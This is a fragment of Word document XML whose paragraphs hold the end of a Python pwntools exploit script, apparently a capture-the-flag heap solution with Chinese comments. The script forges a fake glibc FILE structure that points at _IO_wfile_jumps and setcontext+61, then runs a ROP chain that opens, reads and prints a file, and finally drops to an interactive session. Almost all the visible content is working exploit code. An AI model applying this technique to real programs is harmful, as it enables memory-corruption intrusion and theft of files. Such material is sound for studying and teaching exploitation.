    </w:p>
    <w:p w14:paraId="3A62E32B" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1ADC7" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        0x30: [p64(0), p64(0), p64(0), p64(1), p64(fake_io + 0x138)],  # wide_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01649E3D" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        0xa0: [p64(fake_io + 0x30)],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C172FDA" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        0xc0: [p64(1)],   # _mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70937FAE" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        0xd8: [p64(IO_wfile_jumps + 0x30)],    # vtable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65963879" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        0x110: [p64(fake_io + 0x118)], # wide_data -&gt; vtable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F015EBC" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        0x118: flat(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029C37E7" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E195815" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">                0x18: [p64(setcontext_61)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D54FC30" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">            }, filler=b'\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BB71E" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098CF981" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        0x138: flat(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004C8A3B" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135FAE09" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">                0x68: p64(fake_io + 0x1e8),    # rdi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A45660" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">                0x70: p64(0),                # rsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3392978B" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">                0x88: p64(0),                # rdx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CC866A" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">                0xa0: p64(fake_io + 0x1e8),    # rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D5EF5" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">                0xa8: p64(ret)       # ret_addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7140BDA9" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">            }, filler=b'\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8E25F" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED13897" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        0x1e8: flat(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B74F025" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702D7582" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">                0x00: p64(pop_rdi) + p64(name) + p64(pop_rsi) + p64(0) + p64(open64) + p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(name + 0x30) + p64(pop_rdx_r12) + p64(0x100) + p64(0x0) + p64(read_a) + p64(pop_rdi) + p64(name + 0x30) + p64(puts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01F3AA" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">            }, filler=b'\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED88EA" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA4FC7" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    }, filler=b'\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC345CE" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59D8BD" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="4ADC8986" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 发送payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0994C2BC" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>edit(2, pay[0x10:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFF4CBD" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="1F2FA91B" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 开始攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02773E5D" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>hack()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A02930" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>print(hex(io_all))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258E125" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>print(hex(heap_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C21697" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="1EE98A01" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 进入交互模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77502DA5" w14:textId="00601877" w:rsidR="00C54115" w:rsidRPr="00C54115" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C54115" w:rsidRPr="00C5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57EAB" w14:textId="77777777" w:rsidR="00544688" w:rsidRDefault="00544688" w:rsidP="00B32C31">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="09B54FA9" w14:textId="77777777" w:rsidR="00544688" w:rsidRDefault="00544688" w:rsidP="00B3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7B62F" w14:textId="77777777" w:rsidR="00544688" w:rsidRDefault="00544688" w:rsidP="00B32C31">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4B9F89F1" w14:textId="77777777" w:rsidR="00544688" w:rsidRDefault="00544688" w:rsidP="00B32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1"/>
    <w:rsid w:val="00066EB1"/>
    <w:rsid w:val="00174B0F"/>
    <w:rsid w:val="0048740D"/>
    <w:rsid w:val="00544688"/>
    <w:rsid w:val="00677597"/>
    <w:rsid w:val="00B32C31"/>
    <w:rsid w:val="00C54115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E386F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{34EDF602-CFFA-445A-A0FD-7811A39F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C31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11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5411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11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541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32C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2C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2C3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32C31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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-09T13:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-25T03:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>